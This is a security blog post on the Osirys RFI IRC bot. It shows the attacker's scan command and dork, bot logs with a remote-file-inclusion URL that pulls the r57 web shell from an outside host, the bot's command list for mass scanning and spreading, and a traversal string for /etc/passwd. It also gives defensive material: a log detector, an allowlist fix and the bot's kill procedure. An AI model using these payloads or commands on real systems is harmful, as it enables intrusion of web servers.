Controlling an RFI bot – RFI pt3

Let's delve a little deeper into the Osirys IRC bot which I initially discussed in part 1. First I will illustrate how the attacker finds and exploits web servers, then I will discuss how ISPs can get involved and remove these bots from their networks.

First the attacker issues a command to the bot to begin scanning. The scan will search for the dork “index.php?sayfa=” which will find hosts that are vulnerable to this attack.

<[attacker]> !rfi index.php?sayfa= “index.php?sayfa=” -p 75

The bot then searches several search engines to find sites that meet the attacker’s criteria and begins trying to exploit them.

<bot> [*] RFI Scan started -> 75 sites/process
<bot> [+] Bug: index.php?sayfa=
<bot> [+] Dork: “index.php?sayfa=”
<bot> [~] >ABACHO : 0 > “index.php?sayfa=”
<bot> [~] >WEB.DE : 0 > “index.php?sayfa=”
<bot> [~] >YAHOO : 0 > “index.php?sayfa=”
<bot> [~] >ASK : 126 > “index.php?sayfa=”
<bot> [~] >ALLTHEWEB : 3084 > “index.php?sayfa=”
<bot> [~] >UOL : 390 > “index.php?sayfa=”
<bot> [~] >MSN : 2997 > “index.php?sayfa=”
<bot> [~] >ALTAVISTA : 630 > “index.php?sayfa=”
<bot> [~] >WEB.DE : 0 > “index.php?sayfa=”
<bot> [~] >GOOGLE : 0 > “index.php?sayfa=”
<bot> [~] >MSN : 3057 > “index.php?sayfa=”
<bot> [~] >ASK : 363 > “index.php?sayfa=”
<bot> [~] >UOL : 225 > “index.php?sayfa=”
<bot> [~] >VIRGILIO : 0 > “index.php?sayfa=”
<bot> [~] >LYCOS : 1731 > “index.php?sayfa=”
<bot> [~] >ABACHO : 0 > “index.php?sayfa=”
<bot> [*] >EXPLOITABLES: 4561 “index.php?sayfa=”
<bot> [+] ExPLoItIng STARTED !!

A vulnerable host is found and the attacker is now able to control the host using their shell, which in this case is in r57.txt.

<bot> (safe: ON) (os: WINNT) http://[removed]/EN/index.php?sayfa=http://www.tos-belarus.org/data/r57.txt???
<bot> (uname -a) Windows NT HERA 5.0 build 2195
<bot> (hdd space) free: ( 4.92 Mb) used: ( 84.00 Kb) tot: ( 5.00 Mb)
<bot> [+] Trying to spread ..
<bot> [%] _/ Exploiting 100 / 4561
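
The exploit URL in the log above has a recognisable shape: the query parameter that the application passes to include() carries a complete http:// URL (here pointing at r57.txt) instead of a page name. The following detector, which is an added example and not code from the original post or from the Osirys bot, reads Apache combined-format access log lines and flags any query parameter whose decoded value is an absolute URL (remote inclusion) or contains traversal or null-byte sequences (local inclusion). The log lines, the source addresses and the host example.invalid are constructed for the example; only the sayfa parameter and the r57.txt file name come from the page.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample log lines in Apache combined format (not real traffic).
# Line 1 mirrors the request shape shown in the bot output above; line 3 shows
# the same remote URL with the scheme percent-encoded; line 4 is a local
# inclusion / traversal attempt with a trailing null byte.
SAMPLE_LOG = """\
203.0.113.5 - - [17/Apr/2009:15:12:01 +0000] "GET /EN/index.php?sayfa=http://example.invalid/data/r57.txt??? HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
203.0.113.5 - - [17/Apr/2009:15:12:02 +0000] "GET /EN/index.php?sayfa=about HTTP/1.1" 200 2048 "-" "Mozilla/4.0"
198.51.100.9 - - [17/Apr/2009:15:13:40 +0000] "GET /index.php?sayfa=%68%74%74%70://example.invalid/r57.txt HTTP/1.1" 200 5120 "-" "-"
198.51.100.9 - - [17/Apr/2009:15:13:41 +0000] "GET /index.php?sayfa=../../../../etc/passwd%00 HTTP/1.1" 404 300 "-" "-"
"""

# Minimal parser for the combined log format: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# A parameter value that is itself an absolute URL is the remote-inclusion indicator;
# traversal sequences or an embedded null byte are the local-inclusion indicator.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
LOCAL_RE = re.compile(r'(?:\.\./|\x00|%00)', re.IGNORECASE)


def classify_value(value):
    """Return 'remote', 'local' or None for one decoded query-parameter value."""
    if REMOTE_RE.match(value):
        return 'remote'
    if LOCAL_RE.search(value):
        return 'local'
    return None


def find_inclusion_attempts(log_text):
    """Scan access-log text; return one finding dict per suspicious query parameter."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        query = urlsplit(m.group('target')).query
        for param, raw in parse_qsl(query, keep_blank_values=True):
            # parse_qsl decodes once; decoding a second time also catches
            # double-encoded payloads such as %2500 -> %00 -> NUL.
            value = unquote(raw)
            kind = classify_value(value)
            if kind:
                findings.append({
                    'ip': m.group('ip'),
                    'time': m.group('ts'),
                    'param': param,
                    'value': value,
                    'kind': kind,
                    'status': int(m.group('status')),
                })
    return findings


def count_by_source(log_text):
    """Number of suspicious requests per client IP; a scanner shows up as a cluster."""
    return dict(Counter(f['ip'] for f in find_inclusion_attempts(log_text)))


if __name__ == '__main__':
    for f in find_inclusion_attempts(SAMPLE_LOG):
        print(f"{f['ip']:15} {f['kind']:6} {f['param']}={f['value']!r} (HTTP {f['status']})")
    print(count_by_source(SAMPLE_LOG))
```

To run it over a real server, pass the contents of the access log (for example /var/log/apache2/access.log on Debian-derived systems) to find_inclusion_attempts(); a 200 status on a flagged request is the case worth checking first, because it means the application served the request rather than rejecting it.
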

ISPs can use the following to interact with the bot and remove it from their network. This bot is running on my own IRC server for testing purposes.

Removal of the bot requires administrative credentials, which are available in the script. Looking at the configuration sample below, user “andy” may issue administrative commands to the bot.

my @admins = ("andy");
my $killpwd   = "adminpass"; # Password to kill the bot

Show bot commands

<andy> !help
<RFI[13]> [!] !response  > Test if the RFI Response is working
<RFI[13]> [*] !chid <new rfi-id>  > Change the RFI-Response
<RFI[13]> [*] !killme  > KILL The Bot
<RFI[13]> [!] !milw0rm rss  > Get the last Milw0rm bugs
<RFI[13]> [!] !new rfi bugs  > Get the last 10 RFI bugs
<RFI[13]> [!] !new lfi bugs  > Get the last 10 LFI bugs
<RFI[13]> [!] !new sql bugs  > Get the last 10 SQL Injection bugs
<RFI[13]> [!] !new rce bugs  > Get the last 10 RCE bugs
<RFI[13]> [!] !cari <bug> <dork> -p <sites/proc>  > Start the RFI Scanner
<RFI[13]> [!] !lfi <bug> <dork>  > Start the LFI Scanner
<RFI[13]> [!] !sql <bug> <dork> -p <sites/proc>  > Start the SQL Injection Scanner
<RFI[13]> [!] !rce <bug> <dork> -p <sites/proc>  > Start the RCE Scanner
<RFI[13]> [!] !mass[rfi/lfi/sql/rce] <bug> <dork> -p <sites/proc>  > Start the Mass Scan
<RFI[13]> [*] !cmd <bashline>  > Gives command on the Bot’s shell. Ex: (!cmd id) (!cmd uname -a)
<RFI[13]> [*] !sspread -s <RFI_Vuln_site>  > To spread on a vulnerable host. Ex: (!spread -s www.h.com/a.php?bug=)
<RFI[13]> [*] !admin add/remove <nickname>  > To add/remove a nickname to/from the admin list
<RFI[13]> [*] /msg RFI[13] !Sec ON/OFF -p <pwd>  > To enable or disable Security Mode
<RFI[13]> [*] /msg RFI[13] !Spread ON/OFF -p <pwd>  > To enable or disable Spread Mode
<RFI[13]> [!] !info  > Get infos about the Bot

Gather information

<andy> !info
<RFI[13]> [i] Release : v6 -Private IrcBot
<RFI[13]> [i] Author  : Attacker Nickname
<RFI[13]> [i] Contact : attacker@some.com
<RFI[13]> [i] Uname -a: Linux ubuntu 2.6.28-11-server #42-Ubuntu SMP Fri Apr 17 02:45:36 UTC 2009 x86_64 GNU/Linux
<RFI[13]> [i] Uptime  :  15:11:59 up 6 days, 50 min,  2 users,  load average: 0.05, 0.01, 0.00
<RFI[13]> [i] Spread Mode: OFF
<RFI[13]> [i] Security Mode: OFF

Remove the bot (admin only)

<andy> !cmd rm myscan2.txt (optional step if you know the name of the bot file)
<andy> !killme
<RFI[13]> [!] Bye Bye !
* RFI[13] has quit IRC (Client exited)

Remember that simply removing the bot does not address the underlying vulnerability on the system that allowed it to be compromised.
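
The underlying vulnerability is an include() call fed directly from the sayfa parameter, so the fix belongs in the application: the parameter must be mapped to a known page rather than used as a path or URL. As an added example that is not part of the original post (the page's application is PHP; the same allowlist logic is shown here in Python for illustration), the resolver below accepts only a short lower-case page name that appears in an allowlist, builds the file path itself, and then confirms the canonical path still lies inside the page directory. PAGE_DIR and ALLOWED_PAGES are assumed values standing in for a site's real configuration.

```python
import os
import re

# Assumed values for the example: the fixed directory that holds page templates,
# and the names of the pages the site actually serves.
PAGE_DIR = "/var/www/app/pages"
ALLOWED_PAGES = {"home", "about", "contact"}

# A page name may only be short, lower-case alphanumerics with '_' or '-';
# URLs, '/', '.', '?', '%' and NUL can never pass this check.
SAFE_NAME = re.compile(r"[a-z0-9_-]{1,32}")


def resolve_page(sayfa, page_dir=PAGE_DIR, allowed=ALLOWED_PAGES):
    """Map an untrusted 'sayfa' value to exactly one file under page_dir.

    Raises ValueError for anything that is not a known page name, so the
    parameter can never select a remote file, a traversal target or an
    unexpected local file.
    """
    if not isinstance(sayfa, str) or not SAFE_NAME.fullmatch(sayfa):
        raise ValueError("page name contains characters outside [a-z0-9_-]")
    if sayfa not in allowed:
        raise ValueError("unknown page")
    root = os.path.realpath(page_dir)
    path = os.path.realpath(os.path.join(root, sayfa + ".php"))
    # Defence in depth: even with a clean name, verify the resolved path stays
    # inside the page directory (guards against a mis-set page_dir or symlink).
    if os.path.commonpath([root, path]) != root:
        raise ValueError("resolved path escapes the page directory")
    return path


def classify(sayfa):
    """Convenience wrapper: 'allowed' or 'rejected: <reason>' for one input."""
    try:
        resolve_page(sayfa)
        return "allowed"
    except ValueError as exc:
        return f"rejected: {exc}"


if __name__ == "__main__":
    # Constructed inputs: a normal page, the remote-URL shape from the bot log,
    # a traversal attempt with a null byte, and a name that is not allowlisted.
    for candidate in ["about",
                      "http://example.invalid/data/r57.txt???",
                      "../../../../etc/passwd\x00",
                      "admin"]:
        print(f"{candidate!r:45} -> {classify(candidate)}")
```

The allowlist is the part that matters; the character filter and the containment check only limit the damage if the allowlist is ever bypassed by a later code change. In the PHP original the equivalent is to look the parameter up in a fixed array of page names and include only the array value, never the request value.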

This script also contains valuable investigative information in these two variables:

$auth = "attacker nickname";
$authmail = "attacker@some.com";


1 comment to Controlling an RFI bot – RFI pt3

  • Gustavo Gonzalez

    Hi, I am new to Ubuntu and not very experienced. I saw that someone accessed my machine and ran this and another bot. I wanted to know what I have to do to remove it and fix this vulnerability. Honestly, I did not understand your explanation above very well; I would love it if you could email me some information about this: gustavoagg@gmail.com. Thanks.
